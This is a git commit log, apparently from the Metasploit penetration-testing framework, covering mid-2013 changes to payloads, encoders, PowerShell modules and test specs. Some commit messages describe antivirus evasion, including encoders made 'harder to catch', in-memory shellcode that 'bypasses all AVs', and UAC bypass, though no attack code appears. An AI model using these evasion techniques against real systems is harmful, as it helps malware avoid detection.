2013-10-09 17:30:57 -05:00
Tod Beardsley
c8dc251042
Alphabetize authors
...
Because alphabetizing is cool and makes it easy for humans to find
things in long array lists quickly.
Also, I need to keep my lines changed count up.
2013-10-09 17:29:17 -05:00
James Lee
947925e3a3
Use a proper main signature with arguments
...
Allows us to `unlink(argv[0])`
2013-10-09 17:22:01 -05:00
Tod Beardsley
9d34a8c894
Land #2465 , deal with missing cpuinfo bins
...
[FixRM #8456 ]
Thanks @ZeroChaos!
2013-10-09 13:03:48 -05:00
Tod Beardsley
356263df56
Litter some more rescue nil's in there
...
I hate them but they were there when I got there.
A more sane way to deal with this should happen someday.
2013-10-09 12:17:13 -05:00
Tod Beardsley
f95da649f8
Deal with missing bins, too.
...
This could be way more DRY. At least there's a YARD-ish comment.
This fixes up https://github.com/rapid7/metasploit-framework/pull/2465
to be a more complete solution.
[SeeRM #8465 ]
2013-10-09 12:13:44 -05:00
jvazquez-r7
2593c06e7c
Land #2412 , @mwulftange's printf cmd stager
2013-10-08 09:08:29 -05:00
Tod Beardsley
ff6dec5eee
Promote joev to a first class citizen
...
[See #2476 ]
2013-10-07 12:40:43 -05:00
Markus Wulftange
836ff24998
Clean and fix CmdStagerPrintf
...
Clean up of the CmdStagerPrintf as discussed in mwulftange#1
2013-10-05 10:39:55 +02:00
ZeroChaos
5f4e4de267
fix for bug 8456
...
On systems without bundled johntheripper (either by removing the bundled version or by no compatible version shipped) the system john is used. In this case, all of the checking for compatible bundled jtr makes no sense and as such we can shortcut out of this to not only reduce the size of msf (for embedded) but also to speed execution (saving multiple calls to some random bundled binary cpuinfo*.bin).
This patch makes it very easy to simply remove cpuinfo and msf will not try to run it when missing and default to running john from the path.
2013-10-04 15:58:47 -04:00
James Lee
541833e2cc
Convert llmnr_response to use Net::DNS
...
* Allows responding to AAAA requests in addition to the existing A
support
* Prevents problems when recvfrom returns a mapped address like
"::ffff:192.0.2.1"
Also:
* Fix a few typos
* capture: Don't shadow a method name (arp) with a local variable
* capture: Handle the case where our UDP send hits an ENETUNREACH
2013-10-04 12:35:30 -05:00
Meatballs
c460f943f7
Merge branch 'master' into data_dir
...
Conflicts:
modules/exploits/windows/local/always_install_elevated.rb
plugins/sounds.rb
scripts/meterpreter/powerdump.rb
scripts/shell/spawn_meterpreter.rb
2013-10-02 20:17:11 +01:00
James Lee
b822a41004
Axe errant tabs and unused vars
2013-10-02 13:47:39 -05:00
Meatballs
29a7059eb4
Update AlwaysInstallElevated to use a generated MSI file
...
Fixes bugs with MSI::UAC option, invalid logic and typo...
2013-09-29 17:09:03 +01:00
OJ
58cd2c796e
Add a bind port setting to reverse listeners
...
This adds a `ReverseListenerBindPort` advanced setting to the reverse listeners whic
allows for the local bind port to be separated from the `LHOST` setting used in the
payload. This means that listeners can bind to different ports in cases where the
attacker isn't able to listen on the same port that the victim can call out on, but
there are NATs/portforwards/whatever in place that allow the connection to happen.
2013-09-28 05:38:39 +10:00
Meatballs
8a9843cca6
Merge upstream/master
2013-09-27 20:02:23 +01:00
Meatballs
971d0b7536
Generate args
2013-09-27 12:48:10 +01:00
Meatballs
3d812742f1
Merge upstream master
2013-09-26 21:27:44 +01:00
Meatballs
7ba846ca24
Find and replace
2013-09-26 20:34:48 +01:00
Meatballs
a25833e4d7
Fix %TEMP% path
2013-09-26 19:22:36 +01:00
Tod Beardsley
8696b5d2dc
Fix bug on missing hosts for SunRPC Portmap
...
Also cleans up and normalizes the print messages to follow the
conventions of "host:port - proto - message"
[FixRM #8409 ], reported by Chris F.
2013-09-26 09:42:38 -05:00
jvazquez-r7
58d4096e0f
Resolv conflicts on #2267
2013-09-25 13:06:14 -05:00
joev
99e46d2cdb
Merge branch 'master' into cve-2013-4660_js_yaml_code_exec
...
Conflicts:
modules/exploits/multi/handler.rb
2013-09-25 00:32:56 -05:00
Tod Beardsley
8db1a389eb
Land #2304 fix post module require order
...
Incidentally resolve conflict on current_user_psexec to account for the
new powershell require.
2013-09-23 16:52:23 -05:00
Markus Wulftange
9353929945
Add CmdStagerPrintf
2013-09-23 22:02:29 +02:00
Meatballs
695fdf836c
Generate NonUAC MSIs
2013-09-21 13:13:18 +01:00
Meatballs
85ea9ca05a
Merge branch 'master' of github.com:rapid7/metasploit-framework into msi_payload
2013-09-21 12:49:38 +01:00
Joe Vennix
a08d195308
Add Node.js as a platform.
...
* Fix some whitespace issues in platform.rb
2013-09-20 18:14:01 -05:00
jvazquez-r7
87f75e1065
Complete CmdStagerEcho code doc
2013-09-20 13:24:53 -05:00
Meatballs
7d1c5c732a
Correct powershell
2013-09-20 18:36:24 +01:00
Meatballs
5add142789
Choose smallest smallest
2013-09-20 13:47:51 +01:00
Meatballs
a00f3d8b8e
initial
2013-09-20 13:40:28 +01:00
Tod Beardsley
e9e1b28ba8
Land #2371 , echo -e cmd stager
2013-09-19 14:47:39 -05:00
James Lee
8fe9132159
Land #2358 , deprecate funny names
2013-09-18 14:55:33 -05:00
James Lee
150f0f644e
Merge branch 'rapid7' into bug/osx-mods-load-order
...
Conflicts:
modules/post/windows/gather/enum_dirperms.rb
2013-09-17 18:21:13 -05:00
Tod Beardsley
dae8847c4d
Land #2374 , more complete 32/64 migrate fix
...
[FixRM #8395 ]
2013-09-17 14:52:04 -05:00
Meatballs
9aca98a9d4
Dont need to bypass
2013-09-17 19:12:49 +01:00
James Lee
c77d49a640
Merge branch 'rapid7' into cleanup/remove-id-tags
...
Conflicts:
lib/msf/core/payload/osx/bundleinject.rb
lib/msf/core/payload/windows/dllinject.rb
lib/msf/core/payload/windows/exec.rb
lib/msf/core/payload/windows/loadlibrary.rb
lib/msf/core/payload/windows/reflectivedllinject.rb
lib/msf/core/payload/windows/x64/reflectivedllinject.rb
scripts/meterpreter/netenum.rb
2013-09-17 10:55:02 -05:00
James Lee
97d3a20f82
Remove more $Revision tags
2013-09-17 10:46:37 -05:00
James Lee
d6954e9ce7
Fix migrate from 32- to 64-bit processes
...
In some cases, it was possible to end up in a situation where the x64
reflective library hadn't been loaded by the time a user typed migrate.
If the target process was 64-bit, msfconsole would error out with a
NoMethodError and much sadness would ensue.
[See #2356 ]
2013-09-16 16:04:50 -05:00
jvazquez-r7
a8198bc948
Add documentatio to the mixin
2013-09-16 11:55:30 -05:00
jvazquez-r7
a5049df320
Add echo CmdStager
2013-09-16 11:35:05 -05:00
Meatballs
60328d5b2a
Bypass no profile and hidden by default
2013-09-13 21:22:15 +01:00
Tod Beardsley
53a7e74813
Land #2360
...
All the specs pass, and it's difficult to repo many of these cases to
see if bugs are actually here, but it's a good idea to enforce binary
regexs.
2013-09-13 14:43:53 -05:00
Meatballs
9ade4cb671
Refactor
2013-09-13 20:43:09 +01:00
Meatballs
aa4ad2b005
Change to ' and remove "
2013-09-13 20:23:18 +01:00
Meatballs
243d3d6ebd
Apply comments
2013-09-13 19:19:54 +01:00
HD Moore
72dff03426
FixRM #8396 change all lib use of regex to 8-bit pattern
2013-09-12 16:58:49 -05:00
James Lee
6cc5965123
Land #2278 , exe injection refactor
2013-09-12 16:37:58 -05:00
Tod Beardsley
76f27ecde8
Require the deprecation mixin in all modules
...
Because rememberin to require it, and hoping against a race is not how we
roll any more.
2013-09-12 15:49:33 -05:00
David Maloney
e80cda4ace
Merge branch 'master' into spike/exe_generation
2013-09-12 12:36:10 -05:00
James Lee
30c2efe3b2
Add require for eventlog
...
Even though nothing uses it except an old script
2013-09-11 16:21:10 -05:00
Markus Wulftange
80243c6e4d
Disable default sorting on MSSQL results
...
When printing output using the `mssql_print_reply`, the output gets
sorted by default by the first column. This can distort the output,
especially when the row order is crucial like in case of executing
external commands with `mssql_xpcmdshell`.
This patch disables sorting by initializing Rex::Ui::Text::Table
with SortIndex = -1.
2013-09-09 20:14:48 +02:00
David Maloney
5773a009f5
Merge branch 'spike/exe_generation' of github.com:/dmaloney-r7/metasploit-framework into spike/exe_generation
2013-09-09 12:17:36 -05:00
David Maloney
d6e4e46d86
better validation of buffer register
2013-09-09 12:16:15 -05:00
jvazquez-r7
eb745af12f
Land #1054 , @Meatballs1 exploit for IPsec Keying and more
2013-09-05 16:53:20 -05:00
Tab Assassin
2bd1fb451b
Retab changes for PR #1569
2013-09-05 16:16:05 -05:00
Tab Assassin
48cf2af685
Merge for retab
2013-09-05 16:16:00 -05:00
James Lee
adfb31e30a
Land #2316 , don't modify datastore in authbrute
2013-09-05 16:04:15 -05:00
jvazquez-r7
368a78a963
Undo post setup change
2013-09-05 15:00:58 -05:00
Meatballs
d4043a6646
Spaces and change to filedropper
2013-09-05 20:41:37 +01:00
Meatballs
c5daf939d1
Stabs tabassassin
2013-09-05 20:36:52 +01:00
Tab Assassin
874ed2ac17
Retab changes for PR #2107
2013-09-05 14:30:08 -05:00
Tab Assassin
27564b2de2
Merge for retab
2013-09-05 14:30:03 -05:00
James Lee
41f6ab3073
Land #2294 , fix post setup
...
Conflicts:
lib/msf/core/post.rb
2013-09-05 14:11:32 -05:00
Tab Assassin
f5a4c05dbc
Retab changes for PR #2267
2013-09-05 14:11:03 -05:00
Tab Assassin
4703a10b64
Merge for retab
2013-09-05 14:10:58 -05:00
Tab Assassin
63612a64e9
Merge for retab
2013-09-05 14:08:09 -05:00
Tab Assassin
d0360733d7
Retab changes for PR #2282
2013-09-05 14:05:34 -05:00
Tab Assassin
49dface180
Merge for retab
2013-09-05 14:05:28 -05:00
Tab Assassin
845bf7146b
Retab changes for PR #2304
2013-09-05 13:41:25 -05:00
Tab Assassin
adf9ff356c
Merge for retab
2013-09-05 13:41:23 -05:00
Tab Assassin
abb52a086c
Retab changes for PR #2316
2013-09-05 13:33:59 -05:00
Tab Assassin
8665de0261
Merge for retab
2013-09-05 13:33:49 -05:00
Tab Assassin
896bb129cd
Retab changes for PR #2325
2013-09-05 13:24:09 -05:00
Tab Assassin
5ff25d8b96
Merge for retab
2013-09-05 13:23:25 -05:00
James Lee
b913fcf1a7
Add a proper PrependFork for linux
...
Also fixes a typo bug for AppendExit
2013-09-04 00:15:07 -05:00
Meatballs
1471a4fcef
Fixes an error in file_dropper where @dropped_files is nil
...
causing an exception to be raised and on_new_session to fail.
I have moved super to the top of the chain so it always gets
called regardless.
2013-09-03 23:45:41 +01:00
Meatballs
c687f23b81
Better error handling
2013-09-03 22:57:27 +01:00
Meatballs
a8e77c56bd
Updates
2013-09-03 22:46:20 +01:00
Meatballs
ac0c493cf9
Merge branch 'master' of github.com:rapid7/metasploit-framework into local_win_priv_keyring
2013-09-03 21:33:11 +01:00
Meatballs
13244efecf
Spacing and bugfixes
2013-09-02 21:57:11 +01:00
Meatballs
051ef0bdfa
Refactor to common post module
2013-09-02 20:24:54 +01:00
jvazquez-r7
560d384633
Do first modification to Auxiliary::Login and Auxiliary::AuthBrute
2013-08-31 23:38:04 -05:00
Tab Assassin
7e5e0f7fc8
Retab lib
2013-08-30 16:28:33 -05:00
Meatballs
53c3f6b2db
Deconflict
2013-08-30 10:52:42 +01:00
James Lee
37f8d7a536
And one more.
2013-08-29 23:52:00 -05:00
James Lee
49bfc84ea6
Bah, missed changes after refactor
...
Thanks, travis-ci!
2013-08-29 23:39:29 -05:00
James Lee
63adde2429
Fix load order in posts, hopefully forever
2013-08-29 13:37:50 -05:00
jvazquez-r7
ab58e2db41
Ensure PostMixin setup is called
2013-08-27 18:03:30 -05:00
sinn3r
a91b38cbf4
Land #2276 - osx webcam and record_mic post modules
2013-08-27 12:28:14 -05:00
lsanchez-r7
007b3de06d
Merge pull request #2271 from bturner-r7/bug/db-leaks
...
Land #2271 , Fix database connection leaks
2013-08-26 14:39:11 -07:00
David Maloney
5a424ab4df
Allow user supplied buffer register
...
let the user pick, otherwise default to edx
2013-08-26 13:15:12 -05:00
Meatballs
3b9ded5a8e
BypassUAC now checks if the process is LowIntegrityLevel
...
and fails if so. Some small improvements made to Post::Priv
and BypassUAC module.
2013-08-26 13:54:55 +01:00
David Maloney
383c9ed7f8
set edx as a BufferRegister
...
polymorphic encoders can now always use EDX
as a BufferRegister, making it harder to catch
the decoder stub.
2013-08-25 14:18:32 -05:00
Meatballs
96c093dce0
Fix Exploit::Exe
2013-08-25 19:56:29 +01:00
Meatballs
66ee15f461
Merge and deconflict
2013-08-25 19:14:15 +01:00
David Maloney
f5e9089dd5
remove dupe comment
2013-08-25 12:46:47 -05:00
David Maloney
a50fa2deec
style fixups
2013-08-25 12:37:30 -05:00
Christian Mehlmauer
035258389f
use feed first before trying to bruteforce
2013-08-25 10:16:43 +02:00
David Maloney
4c57af051a
Revert "'remove unused framework references"
...
This reverts commit 98a09b9f5c
.
2013-08-24 17:52:57 -05:00
David Maloney
98a09b9f5c
'remove unused framework references
...
passing around framework references that are never used
removing these whever possible
2013-08-24 16:59:29 -05:00
David Maloney
8f47aa6dcb
Basic Injector class
...
create a class for injecting payloads
into an exe template as a new section
2013-08-24 16:11:00 -05:00
Christian Mehlmauer
7cd150b850
another module
2013-08-24 18:42:22 +02:00
Joe Vennix
2d3f599498
Moves ruby_dl helpers to proper place in repo.
...
* Adds fail_with methods and moves timeouts to constants.
2013-08-23 17:17:19 -05:00
Brandon Turner
cd45c77080
Fix a few database leaks
...
All database access should be wrapped in with_connection blocks.
To avoid breaking git blame with a bunch of whitespace, I outdented
the with_connection blocks as seems to be common in db.rb.
[Story #55586616 ]
2013-08-21 18:53:17 -05:00
Brandon Turner
c0700673e7
Fix SessionManager database leak
...
All database access should be wrapped in with_connection blocks.
Much of this commit is whitespace. It may help to view it with
--ignore-all-space or the w=0 parameter on GitHub.
[Story #55586616 ]
2013-08-21 17:34:25 -05:00
Christian Mehlmauer
009d8796f6
wordpress is now a module, not a mixin
2013-08-22 00:05:58 +02:00
Christian Mehlmauer
0a2bf9e9e7
implement @limhoff-r7 feedback
2013-08-21 21:10:00 +02:00
Christian Mehlmauer
2e9a579a08
implement @limhoff-r7 feedback
2013-08-21 21:05:52 +02:00
Christian Mehlmauer
ffdd057f10
-) Documentation
...
-) Added Wordpress checks
2013-08-21 14:27:11 +02:00
Christian Mehlmauer
655e2dcf6c
more methods
2013-08-21 13:13:41 +02:00
Christian Mehlmauer
68a51f4055
msftidy
2013-08-21 12:50:26 +02:00
Christian Mehlmauer
11ef8d077c
-) added wordpress mixin
...
-) fixed typo in web mixin
2013-08-21 12:45:15 +02:00
sinn3r
f148eb4715
Land #2255 - Fix fail_with()
2013-08-20 01:28:21 -05:00
jvazquez-r7
491ea81acf
Fix calls to fail_with from mixins
2013-08-19 16:42:52 -05:00
jvazquez-r7
7e37130837
Patch for [SeeRM #8315 ]
2013-08-19 16:34:02 -05:00
Tod Beardsley
1eb3c323ed
Land #2175 , force string encoding for RPC
...
Metasploit takes great pains to ensure that all strings are encoded as
plain old US-ASCII. This PR enforces this conversion over RPC as well.
[FixRM #7888 ]
2013-08-16 16:09:24 -05:00
Tod Beardsley
7937fbcc49
More idiomatic ruby with symbols and spaces
2013-08-16 15:59:04 -05:00
HD Moore
bec15ebf7c
Remove Failure (moved to parent class)
2013-08-15 13:31:21 -05:00
HD Moore
4706f8b54c
Add fail_with() stub and move Failure from Exploit
2013-08-15 13:30:47 -05:00
sinn3r
bd6a45fffa
Get rid of version() use
2013-08-14 11:00:09 -05:00
sinn3r
83aec3b231
Remove module version display
...
Since modules no longer use the 'Version' key, there's no point to
collect and show them. It's all 0 anyway.
[See RM 8278]
2013-08-14 02:26:39 -05:00
James Lee
3827b14103
Land #1726 , ssl verify mode
...
Conflicts:
lib/rex/socket/parameters.rb
Fix doc strings
2013-08-12 17:57:10 -05:00
jvennix-r7
8278808a37
Merge pull request #2204 from todb-r7/bug/undo-optstring-validator
...
Revert "OptString specs and better validation"
2013-08-09 13:42:46 -07:00
Tod Beardsley
02f460287b
Revert "OptString specs and better validation"
...
This reverts commit d66779ba4c
.
Specifically, this commit was causing trouble when a datastore was
getting an Integer. For some reason (as yet undiscovered), the option
normalizer wasn't trying to Integer#to_s such arguments.
This kind of thing is going to happen a lot. For now, I'd rather just
end up with the ducktype, and attack the normalizer in a seperate fix.
2013-08-09 15:30:42 -05:00
sinn3r
4558aca7ca
Land #2136 - Removed requirement for note.data to be present
2013-08-09 15:29:25 -05:00
Meatballs
08c32c250f
File versions
2013-08-08 19:42:14 +01:00
RageLtMan
2c850d8f8b
Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import
2013-07-31 18:39:46 -04:00
RageLtMan
7c46e95e8f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into powershell_import
2013-07-31 18:34:57 -04:00
allfro
9180dd59fe
Patch for string encoding issues with `msgpack`
...
Fixes an issue that causes exploits to fail if the PAYLOAD option is the last option to get marshalled in an MSFRPC dictionary. The patch adjusts the string's encoding to match the internal default encoding used by Ruby. Hence, making `fetch()` succeed.
2013-07-30 13:38:44 -04:00
Tod Beardsley
7e539332db
Reverting disaster merge to 593363c5f
with diff
...
There was a disaster of a merge at 6f37cf22eb
that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).
What this commit does is simulate a hard reset, by doing thing:
git checkout -b reset-hard-ohmu
git reset --hard 593363c5f9
git checkout upstream-master
git checkout -b revert-via-diff
git diff --no-prefix upstream-master..reset-hard-ohmy > patch
patch -p0 < patch
Since there was one binary change, also did this:
git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf
Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.
2013-07-29 21:47:52 -05:00
jvazquez-r7
05be76ecb7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-29 16:41:22 -05:00
jvazquez-r7
593363c5f9
Land #2154 , @wchen-r7's msfcli optimizations and refactoring
2013-07-29 16:38:32 -05:00
Meatballs
e1cfe7cfe2
Update datastore changes
2013-07-29 15:31:59 +01:00
sinn3r
a0decf502f
Refactor msfcli
2013-07-28 12:40:50 -05:00
jvazquez-r7
4a0b33241f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 18:41:50 -05:00
sinn3r
7b7603a5e7
Land #2104 - reverse_https_proxy
2013-07-25 17:26:56 -05:00
jvazquez-r7
33f6f7e8fc
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 17:03:45 -05:00
William Vu
27a540e12f
Land #1215 , creds reuse for AuthBrute modules
2013-07-25 16:54:44 -05:00
jvazquez-r7
2b3dcaf678
Land #2157 , @wvu and @averagesecurityguy patch for OpenVAS XML Reports importing
2013-07-25 12:04:38 -05:00
William Vu
97680304d6
Use index, since it can apparently do regex
2013-07-25 12:00:33 -05:00
sinn3r
56367ef69c
Update documentation
2013-07-24 19:04:47 -05:00
sinn3r
0fd2c385fb
Update documentation
2013-07-24 19:02:10 -05:00
sinn3r
e266d1bd0a
Add comment about opts
2013-07-24 19:00:58 -05:00
sinn3r
a71d7eb372
Update archive.rb to handle whitelist
2013-07-24 18:59:43 -05:00
sinn3r
9ae550c883
Do if [].empty?. Avoid msfcli running as a job
2013-07-24 18:35:06 -05:00
sinn3r
ed51d284fa
Change name, change how data is passed, fix rspec
2013-07-24 17:15:56 -05:00
sinn3r
e120ecfba9
msfcli is designed to load only one module (auxiliary or exploit),
...
so we shouldn't have to load all of them to run this utility. The
overall goal of this PR is to narrow down what modules
(exploit/aux + payload + encoder + nop) you possibly need in order
to shave off loading time. By doing this, on my box this is 5-6
seconds faster than the original one.
I actually tried to avoid making too many changes in the library
(such as Module Manager), because we don't have test cases for them,
and we can't really afford to risk breaking it. I also developed
a test script to actually be able to test msfcli.
2013-07-24 14:40:46 -05:00
jvazquez-r7
e9a4f6d5da
Merge branch 'dll_fix' of https://github.com/Meatballs1/metasploit-framework
2013-07-24 14:00:52 -05:00
Meatballs
fee5fabb91
Revert x64 corruption changes
2013-07-24 19:59:04 +01:00
Meatballs
44cae75af1
Cleanup
2013-07-24 19:52:59 +01:00
Meatballs
4b84b49674
Fix payload corruption
2013-07-24 19:08:02 +01:00
jvazquez-r7
47c21dfe85
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-24 11:42:11 -05:00
William Vu
d493346691
Land #2137 , fixes and specs for Opt containers
2013-07-23 15:58:09 -05:00
jvazquez-r7
b0c17fdebc
Land #2002 , @jlee-r7's patch for better handling uri resources
2013-07-23 15:49:21 -05:00
jvazquez-r7
99a345f8d1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-22 13:54:26 -05:00
jvazquez-r7
77e8250349
Add support for CWE
2013-07-22 12:13:56 -05:00
RageLtMan
4df3b0215c
replace lib/msf/core/exploit/powershell.rb, thanks @Meatballs1
2013-07-20 19:55:01 -04:00
David Maloney
943dde5c6c
OptRegexp specs
2013-07-20 18:44:55 -05:00
RageLtMan
9d93891395
Import old powershell post lib from master
...
This is temporary and rather messy. Since the internals for
dealing with PSH code have moved to Rex there may be a hiccup or
two here. This was my original attempt at basic PSH integration
and does not make use of the new libraries and namespaces in
this PR.
Will introduce the updated modules and libraries in separate PR.
2013-07-20 19:33:19 -04:00
RageLtMan
eb185375f7
Trim to core requirements
...
Remove .NET compiler, post lib and modules.
2013-07-20 19:31:26 -04:00
RageLtMan
dc15c5b505
Merge branch 'master' into powershell_import
...
Resolve conflicts from old code being pulled into master.
Conflicts:
lib/msf/core/exploit/powershell.rb
modules/exploits/windows/smb/psexec_psh.rb
2013-07-20 19:29:55 -04:00
David Maloney
d66779ba4c
OptString specs and better validation
2013-07-20 17:49:03 -05:00
David Maloney
d6f2b28708
More opt specs
2013-07-20 17:37:39 -05:00
Samuel Huckins
832db57171
Removed requirement for note.data to be present. It wasn't required in
...
the model or in specs, but was in db.rb, resulting in an error during
certain import scenarios.
2013-07-20 10:27:12 -05:00
David Maloney
ec82644bd3
mo fixes mo specs
...
SEERM #7536
SEERM #7537
2013-07-18 15:00:57 -05:00
jvazquez-r7
1a5e0e10a5
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-18 13:53:57 -05:00
sinn3r
9d92b38dc7
Land #2121 - add specs for module search filter
2013-07-18 13:50:26 -05:00
Joe Vennix
67d8c1170b
Remove unnecessary whitespace.
2013-07-18 13:43:30 -05:00
David Maloney
57dd525714
More optaddressrange specs and fixes
...
SEERM #7536
2013-07-18 13:03:32 -05:00
Joe Vennix
f4b0ab8184
Adds 141 passing specs to Msf::Module#search_filter.
...
* tests exclusion functionality, type: matching, port: matching, app: matching,
platform: matching, author: matching, text: matching, name: matching, and
path: matching.
[RM #4790 ]
2013-07-18 12:47:08 -05:00
David Maloney
22e4db04e0
opening specs and fixes for OptAddressRange
2013-07-18 12:44:48 -05:00
David Maloney
27e2469d8e
Specs and code changes for OptAddress
...
handles wierness around Optaddress.
Still need to address isues in optaddressRange
FIXRM #7537
2013-07-17 20:21:24 -05:00
jvazquez-r7
58229ff8b7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-17 20:18:48 -05:00
Tod Beardsley
72df070b80
Bump version to 4.8.0-dev, -rls is so fleeting
2013-07-17 16:43:24 -05:00
Tod Beardsley
8d1a760b1f
Bump version to -rls
2013-07-17 16:42:37 -05:00
jvazquez-r7
11f8b351c0
Merge branch 'nvidia' of https://github.com/Meatballs1/metasploit-framework
2013-07-17 11:44:42 -05:00
Alexandre Maloteaux
a5d526d710
remove metsrv.dll
2013-07-15 17:16:21 +01:00
Alexandre Maloteaux
e28dd42992
add http authentification and socks
2013-07-15 15:36:58 +01:00
Alexandre Maloteaux
f48c70d468
enable tor and small fix
2013-07-13 17:59:49 +01:00
James Lee
94f8b1d177
Land #2073 , psexec_psh
2013-07-12 16:14:17 -05:00
James Lee
91b748a701
Make it clear where we failed
...
Even when VERBOSE=false
2013-07-12 15:57:30 -05:00
corelanc0d3r
e8983a21c5
New meterpreter payload reverse_https_proxy
2013-07-12 16:45:16 -04:00
William Vu
e8294b4f02
Add tentative fixes
2013-07-12 07:12:07 -05:00
James Lee
1ac1d322f2
Dup before modifying
...
Because `remove_resource` modifies @my_resources, we can't call it while
iterating over the actual @my_resources. The following snippet
illustrates why:
```
>> a = [1,2,3,4]; a.each {|elem| a.delete(elem); puts elem }
1
3
=> [2, 4]
```
[See #2002 ]
2013-07-12 00:57:10 -05:00
James Lee
38e837dc28
Remove inaccurate comment
2013-07-11 22:48:35 -05:00
William Vu
f267c11bc4
Add regex fix
2013-07-10 15:43:16 -05:00
Tod Beardsley
56ffa4ae2f
Fixes for network_interface PR #2085
...
Implementing the suggestions from @limhoff-r7.
See #2085
FixRM #8023
FixRM #7943
2013-07-10 13:25:06 -05:00
lsanchez-r7
4541a9e49e
now with passing msftidy
2013-07-08 17:44:50 -05:00
lsanchez-r7
5c93fb2849
arp_sweep is once again working
...
modified the capture mixin to use NetworkInteface instead of
pcaprub for interfaces and addresses
FIXRM #8023,#7943
2013-07-08 17:24:28 -05:00
Meatballs
2bfe8b3b29
msftidy
2013-07-05 22:35:22 +01:00
Meatballs
0ce3fe2e7c
Added service status checks to Post::Windows::Services
...
Added QueryServiceStatus to Railgun Advapi32 Definitions
Added Checks to module
2013-07-05 22:25:04 +01:00
jvazquez-r7
0e2380c115
Fix method documentation
2013-07-05 11:19:53 -05:00
RageLtMan
4554cc6e51
Import Powershell libs and modules (again)
...
Add Rex powershell parser:
reads PSH, determines functions, variables, blocks
compresses and cleans up the code it's read, obfuscates
handles string literals and reserved variable names
extracts code blocks and functions for reuse
turns powersploit into a useful sub-component for MSF
Rewire Msf powershell modules
Make use of Rex parser
Handles payload generation, substituions
Brings convenience methods - byte array generation and download
Re-add .NET compiler
Compiles .NET code (C#/VB.NET) in memory
Can generate binary output file (dynamic persistence)
Handles code-signing (steal cert with mimikatz, sign your bin)
Not detected by AV (still...)
Update payload generation
GZip compression and decompression (see Rex module as well)
msftidy violations for space efficiency - each char counts
Re-submit psexec-psh
Makes use of updated Msf and Rex modules
Runs shellcode in-memory (in a hidden PSH window)
Completely bypasses all AVs tested for the last year...
2013-07-04 14:04:19 -04:00
Meatballs
1a0bdf335e
Retab lib
2013-07-04 12:09:46 +01:00
Meatballs
a76ee6c2ec
Add flexibility to lib
2013-07-04 11:03:48 +01:00
Meatballs
1368c1c27f
Move options to lib
2013-07-04 10:25:08 +01:00
Meatballs
03de8c1c3d
Pull in exploit/powershell
2013-07-04 09:54:40 +01:00
sinn3r
0f37bbe78e
Add has_pid? function
...
[SeeRM:#8123] - Add commonly used function has_pid?. Related to
redmine issue 8123.
2013-07-02 14:33:15 -05:00
jvazquez-r7
a5c3f4ca9b
Modify ruby code according to comments
2013-06-29 08:54:00 -05:00
sinn3r
e3989ad30c
Extra comments, no thanks
2013-06-28 15:44:06 -05:00
sinn3r
f4c805f5d6
Yarrrrrrrrd
2013-06-28 15:42:56 -05:00
sinn3r
6e1fa05757
Fix a handle leak & change thread creation flag
2013-06-28 13:23:08 -05:00
sinn3r
554d738f26
Update documentation
...
Fix broken English
2013-06-28 13:03:05 -05:00
sinn3r
b7430cb569
Add Msf::Post::Windows::Process
...
The purpose of Msf::Post::Windows::Process is have all the common
functions you might need to do something to a process, for example:
injecting something to a process and then run it.
2013-06-28 12:55:06 -05:00
David Maloney
ea13ac48ec
"fix" indentation to make egypt happy
2013-06-27 17:16:13 -05:00
David Maloney
89faba288d
damnit brandon turner
2013-06-27 17:12:37 -05:00
David Maloney
867be1257a
slight rearrangement
2013-06-27 17:09:20 -05:00
David Maloney
e3fde02eec
conditional wrapping
...
as per egypt's catch
2013-06-27 17:07:16 -05:00
David Maloney
70433820a9
fixes FD leak in RPC client
...
FD leak due to sockets not getting closed
on the rpc client
FIXRM #8107
2013-06-27 16:57:02 -05:00
Josh
d7eda343e9
fix typo in comment
...
change runing to running
2013-06-27 03:12:49 -05:00
James Lee
31ad7b50a9
Fix write_file on FreeBSD
...
[SeeRM #8083 ]
2013-06-25 17:19:00 -05:00
Daniele Martini
c0fda81eb0
Removed options DB_ADD_ALL. Added options DB_ALL_PASS and DB_ALL_USERS
...
to add already known user and passwords to the lists.
2013-06-23 18:20:41 +02:00
James Lee
3c42fe594e
No need to have rescue around a print
2013-06-21 15:55:43 -05:00
James Lee
2c12a43e77
Add a method for dealing with hardcoded URIs
2013-06-21 15:48:02 -05:00
James Lee
39d011780e
Move deletion into #remove_resource
...
Doing it here means that modules manually calling remove_resource won't
screw up the cleanup
2013-06-21 15:34:54 -05:00
James Lee
e8a92eb196
Keep better track of resources
...
[See #1623 ]
[SeeRM #7692 ]
2013-06-21 14:51:47 -05:00
James Lee
81b4efcdb8
Fix requires for PhpEXE
...
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
HD Moore
819080a147
Enable rhost/rport option overrides in HttpClient
2013-06-17 11:45:01 -05:00
Tod Beardsley
d341b825d0
Rename dirbust option to conform to style
2013-06-14 12:58:08 -05:00
Tasos Laskos
b509ac8504
Crawler mixin: Dirbusting opt moved to advanced
2013-06-13 00:04:31 +03:00
Tasos Laskos
b474cda4aa
Crawler/Anemone: Dirbusting now optional
...
[FIXRM #8030 ]
Anemone updated to make dirbusting optional (on by default) and the Crawler core
module updated to provide an option to do so.
2013-06-13 00:00:09 +03:00
Tod Beardsley
6a5d1d06b2
Make the conditional correct for print_prefix
...
Fixes a bug introduced on #1936 .
2013-06-11 16:16:17 -05:00
Tod Beardsley
f775a0bb01
Handle single quotes for OpenVAS import
2013-06-10 19:45:50 -04:00
Tod Beardsley
9a08090b0f
Inch toward making modules more testable
2013-06-10 16:02:19 -05:00
Tod Beardsley
d4e9431633
Add Gemfile entry for PacketFu
2013-06-10 14:18:05 -05:00
David Maloney
6aa7c74fdd
make anemone also rspect domain
2013-06-07 14:24:14 -05:00
David Maloney
78b2a0a2ac
add domain support to web spider
2013-06-07 12:41:20 -05:00
sinn3r
8e2de6d14f
Updates js_property_spray documentation
...
